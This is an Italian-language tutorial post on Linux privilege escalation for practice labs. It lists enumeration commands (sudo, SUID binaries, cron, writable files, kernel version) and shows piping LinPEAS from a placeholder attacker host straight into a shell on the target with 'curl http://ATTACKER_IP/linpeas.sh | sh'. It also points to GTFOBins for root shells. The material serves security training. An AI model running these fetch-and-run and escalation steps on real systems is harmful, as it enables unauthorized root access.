💻 Software
hacking
Medio
⏱ 15 min
👁 9 visualizzazioni
Linux Privilege Escalation: guida pratica per lab
**Privilege escalation** è l'arte di passare da utente normale a root dopo l'accesso iniziale.
## Prerequisiti
- Accesso shell come utente normale (es. da Metasploitable)
- Kali Linux come attaccante
## Check manuali fondamentali
```bash
# Chi sono?
id && whoami
# Cosa posso fare con sudo?
sudo -l
# SUID binaries (possono eseguire come root)
find / -perm -4000 -type f 2>/dev/null
# Processi root
ps aux | grep root
# Crontab di sistema
cat /etc/crontab
ls -la /etc/cron*
# File scrivibili
find / -writable -type f 2>/dev/null | grep -v /proc
# Versione kernel (cerca CVE)
uname -a
```
## LinPEAS — automazione
```bash
# Dal sistema attaccante
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
python3 -m http.server 80
# Sulla macchina target
curl http://ATTACKER_IP/linpeas.sh | sh
```
## GTFOBins
gtfobins.github.io — lista di binari che permettono privesc.
Esempio: `find` con SUID → shell root.
## Lab consigliato
TryHackMe: 'Linux PrivEsc' room — gratuita e guidata.
Nessun commento ancora. Sii il primo!